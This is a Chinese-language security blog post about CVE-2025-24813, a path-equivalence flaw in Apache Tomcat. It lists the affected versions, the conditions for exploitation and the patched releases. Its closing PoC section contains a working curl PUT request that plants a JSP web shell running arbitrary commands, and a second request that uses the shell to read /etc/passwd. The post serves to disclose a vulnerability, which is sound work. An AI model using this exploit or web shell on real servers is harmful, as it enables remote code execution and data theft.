CVE-2025-24813 – Apache Tomcat 路径等效漏洞
CVE-2025-24813 – Apache Tomcat 路径等效漏洞
Ots安全 2025-04-06 19:15
描述
路径等价:’file.Name’(内部点)导致远程代码执行和/或信息泄露和/或通过 Apache Tomcat 中启用写入的默认 Servlet 添加到上传的文件中。
此问题影响 Apache Tomcat:从 11.0.0-M1 到 11.0.2,从 10.1.0-M1 到 10.1.34,从 9.0.0.M1 到 9.0.98。
如果以下所有情况都为真,则恶意用户能够查看安全敏感文件和/或将内容注入这些文件:
- 为默认 servlet 启用写入(默认情况下禁用)
-
支持部分 PUT(默认启用)
-
安全敏感上传的目标 URL 是公共上传的目标 URL 的子目录
-
攻击者知道正在上传的安全敏感文件的名称
-
安全敏感文件也是通过部分 PUT 上传的
如果以下所有情况均属实,则恶意用户能够执行远程代码执行:
– 为默认 servlet 启用写入(默认情况下禁用)
-
支持部分 PUT(默认情况下启用)
-
应用程序使用 Tomcat 的基于文件的会话持久性和默认存储位置
-
应用程序包含一个可能在反序列化攻击中被利用的库
建议用户升级到版本 11.0.3、10.1.35 或 9.0.99,以修复该问题。
ID: CVE-2025-24813
严重程度:严重
参考链接: https://github.com/advisories/GHSA-83qj-6fr2-vhqg
PoC步骤:
curl1.使用PUT方法发送请求:
curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %><html><body><form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form><% if(request.getParameter("cmd") != null) {Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %></body></html>' -i
2.直接访问上传的文件:
curl"http://target.com/updates.jsp?cmd=cat/etc/passwd" -i
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里